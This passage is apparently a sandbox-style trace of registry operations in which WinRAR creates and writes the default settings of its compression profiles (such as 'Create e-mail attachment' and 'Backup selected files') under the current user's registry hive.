Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Solid, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RecEnabled, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Method, data = 5, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = DictSizeLZ, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = DictSize, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Name, data = Backup selected files, size = 44, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcName False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileNames False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ExclNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = StoreNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXModule, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFX False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = CmtFile, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Solid, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RecEnabled, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = DictSizeLZ, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = DictSize, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = OpenShared, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SaveStreams, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = GenerateArcName, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
